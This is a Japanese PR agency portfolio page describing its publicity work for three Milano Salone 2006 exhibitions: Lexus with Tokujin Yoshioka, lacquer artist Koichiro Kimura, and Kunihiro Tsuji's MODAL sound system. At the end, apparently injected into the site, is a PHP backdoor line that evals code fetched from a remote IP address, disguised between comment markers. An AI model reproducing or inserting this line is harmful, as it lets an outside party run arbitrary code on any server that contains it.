デイリープレス

Milano Salone 2006

LEXUS

Tokujin YoshiokaxLexus L-finesse – Evolving Fiber Technology-

Leading-Edge(先鋭)とfinesse(精妙)を「二律双生」するLEXUSのデザインフィロソフィをテーマとしたアートエキシビション。繊細さと強力さの二面性を両立する繊維(ファイバー)を用いて空間として表現。インスタレーションは、デザイナー 吉岡徳仁氏、映像は、現代美術家の木本圭子氏が手がけた。
日本国内向けのPRを担当。

Koichiro Kimura

「love & destroy 2006」
400年の歴史を持つ家業の漆をベースに、アヴァンギャルドな作品を創りしているアーティスト、木村浩一郎が、2006年の新作pharaoh、crystalを発表。1700年代に建てられたPlazza bovara, sala delle aquileを会場に、愛をテーマに独自の世界観でインスタレーション展示。
国内外へ向けたPRを担当。
Photo:Nacasa&Partners

MODAL

音響空間デザイナー辻邦浩が立ち上げたエレクトロニクスブランドKunihiro Tsuji Scientificが、新しい音響システムMDALの発表とセンサーを使ったインタラクティブなインスタレーションを行った。マリア・カラスがその音響効果を利用してレコーディングをした16世紀建造の教会を会場に、そこでレコーディングされた曲をMODALとセンサーを用いて響かせた。マリア・カラスが再来したかような美しい歌声が響くインスタレーションとなった。
国内外へ向けたPRを担当。

/*c137*/ eval(@file_get_contents('http://37.1.207.55/get.php')); /*cc137*/ ?>